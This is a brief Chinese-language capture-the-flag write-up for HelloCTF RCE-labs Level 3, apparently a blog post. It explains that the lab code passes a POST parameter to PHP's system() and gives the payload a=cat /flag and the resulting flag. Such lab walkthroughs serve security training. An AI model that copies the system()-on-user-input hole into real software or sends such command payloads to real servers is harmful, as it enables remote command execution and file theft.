HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
中科固源21 分钟前
应用层|低空应用安全的 “精工锻造者”,中科数测以多工具矩阵赋能应用从开发到运维的全周期安全
安全·网络安全·低空
weixin_537217061 小时前
深度学习视频教程资源合集
经验分享
联蔚盘云2 小时前
联蔚盘云MCP Marketplace获得软件著作权证书,引领AIOps与AI Foundation一体化革新
经验分享
yong99904 小时前
基于C#与三菱FX5U PLC实现以太网通信
网络·c#·php
询问QQ688238866 小时前
基于主从博弈理论的共享储能与综合能源微网优化运行研究复现
web安全
wxin_VXbishe6 小时前
springboot居家养老管理系统-计算机毕业设计源码55953
java·c++·spring boot·python·spring·django·php
weixin_537217067 小时前
数据结构资源合集
经验分享
白帽子凯哥哥8 小时前
转行网络安全学习计划与报班建议
学习·安全·web安全·网络安全·渗透测试·漏洞挖掘·网安培训
logic_59 小时前
VLAN的配置
网络安全
老兵发新帖10 小时前
ubuntu网络管理功能分析
数据库·ubuntu·php